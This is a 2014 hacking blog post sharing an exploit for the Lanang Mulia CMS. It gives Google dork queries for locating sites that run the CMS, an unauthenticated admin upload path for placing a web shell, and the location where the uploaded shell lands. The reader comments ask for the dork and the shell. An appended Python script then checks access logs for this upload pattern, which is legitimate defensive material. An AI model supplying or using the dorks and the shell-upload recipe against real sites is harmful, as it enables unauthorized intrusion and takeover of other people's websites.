LinuxSec Exploit

Nothing is Ever Locked

Exploit CMS Lanang Mulia Uploader Vulnerability

January 22, 2014 by Jack Wilder 2 Comments

This time I want to share an exploit I got yesterday from a friend on Facebook. It is called the Lanang Mulia Uploader Vulnerability exploit. The bug is almost the same as the upload bug in the Lokomedia CMS. After I got inside, it turned out that this CMS is almost identical to Lokomedia.
OK, here is the exploit:

Exploit Title: Lanang Mulia Uploader Vulnerability
Google Dork:
intext:” Web By: lanangmulia.net”
inurl:showdetail.php?mod=
For other dorks, work them out yourself, use your brain 😉

Exploit :
[localhost]/admin/upload_1.php
If it has not been patched, you can upload your shell there directly, without tampering with data or logging in 😀
The shell will then be located at
[localhost]/foto/namashell.php

That's all for this tutorial, hopefully it is useful.
Thanks to : BarrabravaZ
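
For site owners, the two paths named in the post are enough to check access logs for this upload flow. The script below is an added example, not part of the original post: it assumes the Apache/nginx "combined" log format and an assumed list of PHP-handled extensions, and the sample log lines are constructed.

```python
import re
from urllib.parse import unquote

# Assumption: Apache/nginx "combined" access-log format; the post shows no logs.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)
UPLOAD_PATH = "/admin/upload_1.php"  # uploader path named in the post
UPLOAD_DIR = "/foto/"                # directory where uploaded files land
# Assumed list of extensions a server may hand to PHP; also catches "x.php.jpg".
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar)(\.|/|$)", re.IGNORECASE)

def scan(lines):
    """Return (kind, ip, timestamp, path, status) for each suspicious request."""
    findings = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m or int(m["status"]) >= 400:
            continue  # unparsable line, or the request was refused / not found
        path = unquote(m["path"].split("?", 1)[0]).lower()
        if m["method"] == "POST" and path == UPLOAD_PATH:
            kind = "upload_post"
        elif path.startswith(UPLOAD_DIR) and SCRIPT_EXT.search(path):
            kind = "script_in_upload_dir"
        else:
            continue
        findings.append((kind, m["ip"], m["ts"], path, int(m["status"])))
    return findings

def correlated_ips(findings):
    """IPs that both posted to the uploader and requested a script under /foto/."""
    posted = {f[1] for f in findings if f[0] == "upload_post"}
    fetched = {f[1] for f in findings if f[0] == "script_in_upload_dir"}
    return posted & fetched

SAMPLE_LOG = [  # constructed lines using documentation IP ranges
    '198.51.100.7 - - [22/Jan/2014:08:01:10 +0700] "GET /showdetail.php?mod=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [22/Jan/2014:08:01:42 +0700] "POST /admin/upload_1.php HTTP/1.1" 200 312 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [22/Jan/2014:08:01:55 +0700] "GET /foto/sample.php?x=1 HTTP/1.1" 200 77 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [22/Jan/2014:08:02:03 +0700] "GET /foto/produk1.jpg HTTP/1.1" 200 20480 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [22/Jan/2014:08:02:09 +0700] "POST /admin/upload_1.php HTTP/1.1" 403 0 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    hits = scan(SAMPLE_LOG)
    for hit in hits:
        print(hit)
    print("correlated:", sorted(correlated_ips(hits)))
```

Any hit of kind `script_in_upload_dir` means the web server is serving script files from the image directory, which should neither accept nor execute them.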

Comments

  1. Anonim says

    January 22, 2014 at 7:59 am

    The dork??

  2. Adha Altafi says

    January 22, 2014 at 8:05 am

    Where's the shell?
